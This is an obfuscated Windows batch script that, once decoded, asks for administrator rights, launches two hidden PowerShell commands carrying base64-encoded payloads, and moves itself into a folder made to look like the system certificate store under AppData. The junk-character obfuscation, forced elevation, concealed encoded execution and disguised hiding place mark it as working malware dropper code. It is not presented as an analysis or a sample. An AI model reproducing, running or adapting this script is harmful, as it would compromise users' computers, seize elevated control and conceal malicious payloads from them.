@%PZt%e%DZwhTfQkv%c%W%h%djupuctRjT%o%wzxyBUBB% %Yj%o%ivZM%f%sgQJwTtu%f%rkhMAdWD%
i%TLEjaZwhE%f%caY% %bxFTkhtBS%n%yJ%o%ccjdqqzT%t%sz% %tRI%"%Qr%%1"=="am_admin" (
    powershell -Command "Start-Process -Verb RunAs -FilePath '%0%VgEA%'%HnSvoES% %MyQHVAj%-%Pb%A%Y%r%HjbmH%g%KB%u%LdjmCqKT%m%veLrVi%e%doOCnN%n%io%t%cJbcifZs%L%YIvQDFHU%i%vfde%s%jIfNqTFH%t%gPFOFm% %Vm%"%WIJAT%a%YEjmWYsq%m%fHPjyGFNy%_%hzgu%a%OTCzBx%d%SuMXp%m%A%i%birB%n%a%"%ZobQLIA%
 %vOQrfwhtTx% %AFqgrY% %vTExd% %WeUQVgk%e%OAIiZGxxo%x%rAJi%i%SiigLU%t%QaHnmVa% %HfVjgSDgJS%/%rcSiHRm%b%h%
)%jI%

p%V%o%pKmqNQAoEx%w%cnGzRXFcJK%e%zAoxKQIEo%r%VCpxxbsYW%s%zAm%h%S%e%YWrIO%l%Ylmiry%l%sBGyPpccO% %ByvKmXskw%-%kyD%W%YEqKcHCbo%i%yd%n%uk%d%gZbGfIr%o%CgbuOUfi%w%xemLiQh%S%AQBJTHAd%t%t%y%vIL%l%Hgmzj%e%b% %Jsps%H%z%i%nFj%d%ZUL%d%ZpN%e%RNshE%n%hFME% %Let%-%vPjc%N%wCKpXUm%o%jld%L%Q%o%XTHAemE%g%oJZ%o%mtoHHkkkyv% %KIUmVn%-%mSawRRkHT%e%VluDYsH%n%skRMMCq%c%A% %tkFYa%K%iyXCzWJY%A%JQEudQ%B%ANOc%p%un%A%wVtaI%H%mteREOh%c%pUWDHCT%A%GVBEUpW%c%FVowGnycW%g%cbGO%A%zBwfC%g%GCPtKc%A%xaJv%G%nbPYRi%g%ICwWUGK%A%xnHOftwf%d%AUtjgJuMpa%A%WKj%B%knTdT%0%piKDoZ%A%zT%H%CnvBThZJ%A%PoxUTntoqz%A%pKy%c%gGCoadHTUO%w%zBBD%A%EjQN%6%qajsJzb%A%foNqbIiWEl%C%mucdYtyPUB%8%KcMFgRNL%A%YTXr%L%zDjK%w%SbSLsLdlw%B%BKfQ%w%vLwLwyNcU%A%vHZCoBk%G%gTyt%E%KPFgPBCrhy%A%vsb%c%txzjs%w%iMQlzGU%B%fBh%0%zF%A%JdmPwCn%G%YxjNvu%U%dnTKY%A%egemdsd%Y%uBKRwWo%g%hcQvXqv%B%WMGrvMCv%p%iQjP%A%InCoLyaI%G%O%4%eLAkAxCoy%A%aUltuk%L%YOKt%g%DgWcUd%B%deuqFyViNu%j%N%A%gQQspPruQC%G%PYvQ%8%uwbbGeFLR%A%uuXlmLN%b%pgA%Q%CmnUDbr%A%szq%v%UK%A%YoTUF%H%YdXSZgYxc%I%wtSHKjt%A%VCAv%Y%UkEKo%Q%KUydQRdY%B%EUyQqgsWAn%3%coYNVPOr%A%RfcQuHeWcs%C%j%8%gpNt%A%PNgRG%M%UUsAQMbH%Q%guAXwqGby%A%ElYP%1%z%A%Dnfj%G%t%M%N%A%lzSjYll%S%NRxlvLqY%A%VoAA%A%J%1%aLtrq%A%YcDZwuDn%H%JtRcTW%I%NSBLmy%A%HGiHlOvTgZ%d%WFjCZvKxzH%g%Ir%B%YZszVqPjtn%o%VIh%A%bJBQiTGnlA%C%jQBYfAptj%k%hUv%A%eidpFs%L%VPfNEPX%g%uGYm%B%brwaH%j%e%A%bPZRU%G%LCYD%8%cylTJvC%A%Ah%b%KzL%g%HPPkoKoWgb%B%mCRYU%0%QLBUsKAo%A%FRwVH%G%zCr%U%NduTdJ%A%OPMmG%b%NjpLX%g%VYQz%B%b%0%EwXoRX%A%ElVhK%C%y%A%kRdGzT%A%JRBfiPf%P%dFaAJOsj%g%AMl%A%hXymTrzTed%g%CjovPh%A%JUXmr%C%s%Q%IDP%A%AYlxGFnv%Z%JrHQzIGSu%Q%sNbVWF%B%NSDufM%u%eU%A%HobQhTzfm%H%qWygxtZo%Y%eQRbhRB%A%ohoCF%O%momKaGBe%g%u%B%NVgGaq%M%rUDhIBJMd%A%WIrK%E%ehNRW%8%mfrv%A%jEkXR%Q%icJzdKEYo%w%zVxa%B%WqPwDD%B%yyvXqaAcu%A%d%E%sPgm%w%xOWbTq%A%moHMpQMrD%Q%jpLHxnW%Q%js%B%o%Q%fxJmMnGjFT%A%gV%F%RnGmvnp%A%DHwEVamkpY%A%aBDS%R%myJdj%A%DZwVzpER%B%Xrj%B%EZCM%A%xLMVk%F%Mp%Q%OpvhEiykeK%A%UPahLVF%Q%TWCV%Q%PRK%B%HcJTnz%c%zOfYFjxzWb%A%QnLa%H%wDHgH%M%xke%A%DbFMDER%e%QCtRtc%Q%rl%B%I%z%abvvhCA%A%YLhjy%G%DH%I%a%A%JoNPsE%b%idNhqeQNVy%w%rqtj%B%PWEYHpTA%v%ewMz%A%zhnXCWsiF%H%jxfljsu%Q%VhPMt%A%xvDTWOXMAT%L%Ru%g%bFXrixKe%B%wjdbeTJinD%w%aSSHJY%A%VRQWzdm%H%M%M%xd%A%wmITvgLdG%M%HG%Q%kMzxUBQqr%A%GRiet%=%iZUiQuMli%
p%kfOoXby%o%fyiSVELO%w%dT%e%eyKBoTgI%r%cOi%s%ASOgZ%h%McJk%e%UGL%l%Dx%l%xyVkMlo% %Nw%-%XC%W%YWF%i%oQPkIyYpXR%n%MiAzHUa%d%oAauzNFPq%o%pCLB%w%OR%S%dex%t%UyViaprXW%y%DaKfRzD%l%cKZwwH%e%CWaAWZk% %RATUnv%H%iXHfAPeH%i%bHhlzkaCVH%d%YJenqBOe%d%gYsR%e%MPdCU%n%wjIO% %FyKDrvgEjo%-%CSGQHWNtW%N%XMEgj%o%XcXXNW%L%cMnEtd%o%bVMJERBKMg%g%wSL%o%iWxpBn% %CtUT%-%VIgj%e%VlnBrBdb%n%CSCEaYbuZS%c%d% %l%c%fxaqGyiW%A%KsrDQa%B%tTwHTs%v%Xiokqf%A%cMI%H%lLmGOCfXSi%c%EgwWwwCF%A%chmcv%Z%qeeNHgb%Q%SLumNp%B%AyRVfrGb%y%yYMXI%A%yfRxosTaGk%H%AVywDnT%M%dnO%A%zMIWVjZ%a%YArki%A%keHbVnQr%B%B%l%aqIdz%A%eyC%G%er%w%EGZE%A%hfEeou%b%Wyc%A%gSn%A%t%g%mCTKqL%A%Z%C%frmS%0%k%A%sRUbAeYX%R%gRTNPEFYlW%Q%Aao%B%ZBIttg%4%j%A%NMUFkJSW%G%G%U%FpygZr%A%Anr%Y%HwSIlm%w%G%B%iuuCwU%1%zrKhXXY%A%uFpbxs%H%SybDl%Q%zx%A%X%a%ldZJYfkcml%Q%bSHmAs%B%QECS%v%f%A%OaarmA%G%Ozo%4%zxBGSd%A%CHEKVkiD%U%NSCOJmQZSM%A%ka%B%uoc%v%wcb%A%RpTsvifRfD%G%vkuXSS%w%uDfpPDQNeq%A%AfMzF%a%CvIm%Q%qcejoMQ%B%YnBuncz%j%osWDdd%A%NsscaxvUN%H%iAYdYmTEc%k%nfDbBqTXzc%A%DMcHFCHqAb%I%SCxxDapRP%A%xla%B%abdzcslRjJ%C%vtP%A%duoGbATq%H%uiegfyDv%k%bWkz%A%TeqFQcYwb%c%uhymgEk%A%uDzmxISuk%B%JlGXg%h%fKlnUj%A%yNc%H%zO%M%VXsElBE%A%stOY%c%eOT%w%V%A%MMgsPFAXjZ%g%JuvrcnRH%A%LRXB%C%lmsAHYU%0%XnjAzbKD%A%lr%R%o%g%qEYwX%B%BHD%p%S%A%uUmUMaxWXF%G%W%w%YGUg%A%oloBIEg%Z%ySMIweuOs%Q%bSLqtNXz%A%jHv%g%hkptUiV%A%FfghZ%C%XdeF%Q%gAJ%A%ZNQlzOVNa%Z%MSgrJtLDc%Q%iMXqrNJ%B%Rs%u%kkByDH%A%KLoyib%H%jLqvYlUI%Y%IxG%A%LhtVJReAG%O%GERkpAE%g%bbBDwY%B%Tj%M%D%A%S%E%dN%8%quS%A%CZkKpAQwz%Q%rFI%w%iuOSQT%B%RJQ%B%IPxtbt%A%OhTjqiZ%E%ZiC%w%Jgy%A%lgOwRT%Q%popAg%Q%oyj%B%rnAR%Q%rimZoPGH%A%ET%F%ouT%A%OcRJjidEtV%A%JTSfWeJ%R%cvO%A%K%B%iva%B%Pki%A%f%F%ZeI%Q%Bc%A%cDcYqSEHg%Q%T%Q%bGPA%B%hldlGN%c%rvdkxV%A%ewGzIWLUy%H%WbaVt%M%ZJZqBOR%A%GC%e%HTqSwVFWS%Q%vDAOveb%B%kFShus%z%Uty%A%LvH%G%luuA%I%TNpDd%A%ACgQ%b%uUaAhAnn%w%GYJhPlcHDw%B%XD%v%SH%A%jSsD%H%It%Q%CH%A%HdastcbUch%L%JCuPYHvMJ%g%tVBB%B%VdZvrTjem%w%lXBi%A%cLqWSKlUXW%H%t%M%zVJdPb%A%jSwSsvg%M%tsFb%Q%slvkmIn%A%rpXpupTY%N%rNDGZ%A%vALmtri%A%lcRVHQ%o%NUdE%A%JZEl%

s%SZEOrT%e%SGHY%t%zNbcbzie% %wPFYMXoe%"%ENun%d%pSlFulGMEl%e%AYBSFqT%s%nv%t%xqnQBemp%D%CGH%i%uyOvKSL%r%qiR%=%QOWqD%%APPDATA%\%aKsltIGi%M%sqcw%i%LnaYXuZLh%c%EkKDr%r%r%o%cPKIg%s%EDCQcgMQ%o%eizma%f%MDwzz%t%QjiNxCpz%\%YGEsm%S%iQLcczwWY%y%dog%s%ttRI%t%PQpfUFyl%e%NbHG%m%yvqsCZn%C%XXzSoW%e%xSjuE%r%YBCfjNuK%t%BxVqShuExc%i%KnptFQu%f%Lgx%i%vSykq%c%J%a%AHnnuOAr%t%WoBRd%e%rIvzKSCtK%s%IxQMhbzM%\%khUbaVfwN%M%NXcnRD%y%qiI%\%rr%C%XGBTopioGN%e%oKGaAFlGB%r%DC%t%iFPKMxN%i%DKcWwCqYx%f%yBcURAPUo%i%DusMP%c%i%a%rvBQf%t%AKjbVhC%e%H%s%EqXSvxCYWb%"%GVpZoipST%

i%I%f%kCTUprb% %utFgYT%n%AEaeXpn%o%iMn%t%jIOSowVh% %zwQEMonl%e%YoSpZnLDOe%x%CPMkHKoUg%i%nulQcTicU%s%lkRFE%t%pvTBfWDLve% %BKVOGP%"%DErjERkP%%destDir%"%VKIT% %dHfcL%(%Cs%
 %BRqSzf% %XVfCHjSE% %cXvEaCvbNI% %DiBbqphK%m%huUOoI%k%qtdGWh%d%iy%i%NnvkcbRd%r%oKYN% %aPMEHxON%"%KvcOBrL%%destDir%"%F%
)%COwZOIJLzV%

m%ychD%o%BRFXQpPT%v%LvZaxtLCBH%e%F% %ZQi%"%oPzZrLTVWn%%~f0" "%d%miVy%e%n%s%wfNuDnD%t%Kczc%D%txeWSUdTwP%i%ddXunlmo%r%cf%%\"
